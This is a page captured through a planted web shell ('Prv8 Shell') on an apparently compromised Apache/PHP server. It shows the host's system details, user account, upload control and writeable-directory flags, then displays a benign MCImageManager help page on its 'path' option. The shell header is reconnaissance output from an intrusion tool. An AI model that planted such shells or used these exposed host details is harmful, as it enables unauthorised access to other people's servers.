Prv8 Shell
Server : Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4
System : Linux server.jackjohnson.com 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64
User : jackjohn ( 502)
PHP Version : 5.3.17
Disable Function : NONE
Directory :  /home/jackjohn/public_html/imagemanager/docs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/jackjohn/public_html/imagemanager/docs/jsoption_path.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Option: path</title>
<link href="css/screen.css" rel="stylesheet" type="text/css" />
</head>
<body>

<div class="header">
	<h1>Option: path</h1>
</div>

<div class="content">
	<p>This option enables you to specify a default start path, this path will be used when a empty URL is passed to the script or when the remember_last_path option is disabled or when the user starts the MCImageManager for the first time. If this path isn't within the path returned by the Authenticator or within the path configurated it will not be used, this is for security reasons a user would other wise be able to specify any path with a simple JavaScript call.</p>
	<h3>Example of usage in init call on page level:</h3>
	<div class="example">
<pre>
mcImageManager.init({
	path : "/somedir/somedir2"
});
</pre>
</div>
<br />
	<h3>Example of usage in mcImageManager.open call</h3>
	<div class="example">
<pre>
&lt;a href=&quot;javascript:mcImageManager.open('example1','url','','',{path : "/somedir/somedir2"});&quot;&gt;[Browse]&lt;/a&gt;
</pre>
	</div>
</div>

<div class="footer">
	<div class="helpindexlink"><a href="index.html">Help index</a></div>
	<div class="copyright">Copyright &copy; 2005-2006 Moxiecode Systems AB</div>
	<br style="clear: both" />
</div>

</body>
</html>

haha - 2025